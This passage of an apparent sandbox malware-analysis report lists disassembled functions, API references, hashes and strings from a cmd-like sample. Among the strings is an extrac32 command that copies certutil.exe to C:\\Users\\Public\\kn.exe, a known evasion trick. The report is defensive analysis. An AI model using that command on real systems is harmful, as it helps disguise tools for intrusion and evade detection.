                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DB3384
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD11DF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                      • String ID:
                                                      • API String ID: 611521582-0
                                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction ID: e67de628feecd4995199a8be9ed52fba567cc3b849a72915c67a4e4799ac21ff
                                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction Fuzzy Hash: 77A1B332F08612A6E718EB61A84277DF7A1FB49B46F848136DD0E86744DFBCE445C722
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                      • String ID: \\?\
                                                      • API String ID: 628682198-4282027825
                                                      • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                      • Instruction ID: 0e0047877174ccb5597f79595851b8d37e198dd4aa1585147ce000eebb1e1bbf
                                                      • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                      • Instruction Fuzzy Hash: B9E1A126B08682A6EF64EB24E8427F9A3A0FB45749F804136DA0F477D4EF7CE545C351
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                      • String ID:
                                                      • API String ID: 16309207-0
                                                      • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                      • Instruction ID: 7f3a0b447ce4223a926389e97db6297e66d3dd765cd91648b143fa00ab340d61
                                                      • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                      • Instruction Fuzzy Hash: FA229F62B04B8296EB64EF25D8523F9A3A0FF45788F804236DA0E4B795DFBCE145C711
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                      • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 3863671652-4137775220
                                                      • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction ID: a5d8bd550043e07c831d4c9aab387525c9e481b949d0ad55120c46f19a3550e0
                                                      • Opcode Fuzzy Hash: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction Fuzzy Hash: 1BE1DE22E0D64292FB64FB1594567B9E6A0BF89784FC84537DA0E422D0DFBCE841C763
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                      • String ID: $Application$System
                                                      • API String ID: 3538039442-1881496484
                                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                      • Instruction ID: 3c4c0c7e80ede984a8abb4df489120b06ebc7102d8eece773108a3f7b1a557fa
                                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                      • Instruction Fuzzy Hash: B751CB72A08B41A6EB24EB15B44277AFBA1FB89B85F848236DE4E43B40DF7CD445C711
                                                      APIs
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DD048E), ref: 00007FF7E1DDDA58
                                                      • memset.MSVCRT ref: 00007FF7E1DDDAD6
                                                      • memset.MSVCRT ref: 00007FF7E1DDDAFC
                                                      • memset.MSVCRT ref: 00007FF7E1DDDB22
                                                        • Part of subcall function 00007FF7E1DC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DDEAC5,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DC3A56
                                                        • Part of subcall function 00007FF7E1DB5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7E1DB51C4
                                                        • Part of subcall function 00007FF7E1DC823C: FindFirstFileExW.KERNELBASE ref: 00007FF7E1DC8280
                                                        • Part of subcall function 00007FF7E1DC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DC829D
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                        • Part of subcall function 00007FF7E1DB4FE8: _get_osfhandle.MSVCRT ref: 00007FF7E1DB5012
                                                        • Part of subcall function 00007FF7E1DB4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB5030
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DDDDB0
                                                        • Part of subcall function 00007FF7E1DB59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB5A2E
                                                        • Part of subcall function 00007FF7E1DB59E4: _open_osfhandle.MSVCRT ref: 00007FF7E1DB5A4F
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DDDDEB
                                                      • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DDDDFA
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DDE204
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DDE223
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DDE242
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                      • String ID: %9d$%s$~
                                                      • API String ID: 3651208239-912394897
                                                      • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                      • Instruction ID: a1c0262e26d6b0554f71c6bc3564b399bdc687e196625d71b9b66e2c845a3b77
                                                      • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                      • Instruction Fuzzy Hash: E1428F32A08A8296EB24FF25D8523F9B7A4FB85744F800137D64E47A99DFBCE550C712
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                      • String ID: COPYCMD$\
                                                      • API String ID: 3989487059-1802776761
                                                      • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                      • Instruction ID: 9e1a6a94b4b8e035d22c86013eb1e46fd859da1bc61c07694f1971cd81041e7d
                                                      • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                      • Instruction Fuzzy Hash: C9F1C466A08746A2EF14FB15D4027BAA3A0FF45B88F848136DA4E47794DEBCE445C312
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                      • API String ID: 55602301-2548490036
                                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                      • Instruction ID: 1d81495663f18913f5a425ee5dfbf1c4af75a6e8b2850edae04c996415d0972c
                                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                      • Instruction Fuzzy Hash: 56A1C272B1864296EB10EB10E4423BAFBA5FB84754F904533DA4E436D4EFBCE544C792
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                      • String ID:
                                                      • API String ID: 3935429995-0
                                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                      • Instruction ID: 0febf9bca531a8130b892e7c5825a0b866489d6ea6cedbe7e76f82928a983e41
                                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                      • Instruction Fuzzy Hash: 2961B126F08652C2EB18EF25A405679FBA0FB89F56F858136DE4A83790DFBCD441C712
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                      • Instruction ID: 6e1a201696e3ed7ad28779a54e64cccd2fc5207fed1f28e64699dda89a43609c
                                                      • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                      • Instruction Fuzzy Hash: 3591B332A0868296EB28EF25D8117FDB7A0FB49745F848236DA4F46794DFBCE544C321
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandlememset$wcschr
                                                      • String ID: DPATH
                                                      • API String ID: 3260997497-2010427443
                                                      • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                      • Instruction ID: 21d4be82cfa3121dabaa633e2b6f1d48cbe008dccb2820a9a9062a1683d9fcb5
                                                      • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                      • Instruction Fuzzy Hash: 25D19322A0864296EB14EB25D4427BDA3A1FF85B94FC44637DA1E473D4DFBCE441C3A2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                      • String ID: %s$/-.$:
                                                      • API String ID: 1644023181-879152773
                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction ID: 701e5021337040c924c7f446fcc6cad4d86dbdf22d7f0a67309c3071e22cea9d
                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction Fuzzy Hash: 9391A562A0864291EF15EB14E4423BEE3A0FF84B94FC44637DA4E426D4DFBCE595C322
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                      • String ID: @P
                                                      • API String ID: 1801357106-3670739982
                                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                      • Instruction ID: f012a330288890c775e9b7097032eefbf5c261d9baa7bed3ac9dd30fb96c32d5
                                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                      • Instruction Fuzzy Hash: 9F416A32B04A46DAE710EF61D4413FDBBA0FB89B49F848632DA0D43A98DFB8D544C761
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$BufferConsoleInfoScreen
                                                      • String ID:
                                                      • API String ID: 1034426908-0
                                                      • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction ID: 1e2b05eb7fc18875babc9126ddd7b3df1e1bebb1f2a674aa9e18998d8d1fa8a2
                                                      • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction Fuzzy Hash: 82F1A032A097829AEB64EF21D8427E9A7A0FF45784F808136DA4E47795DFBCF504C721
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseValue$CreateDeleteOpen
                                                      • String ID: %s=%s$\Shell\Open\Command
                                                      • API String ID: 4081037667-3301834661
                                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                      • Instruction ID: d714daca24100470a86019048950b9674620c70542a5decd555da3401de8d332
                                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                      • Instruction Fuzzy Hash: 2771C422B0974292EB10EB69A4523B9E3A1FF85790FC48632DE4E47784DFBCE545C721
                                                      APIs
                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAA85
                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAACF
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAAEC
                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB39
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB6F
                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABA4
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABCB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
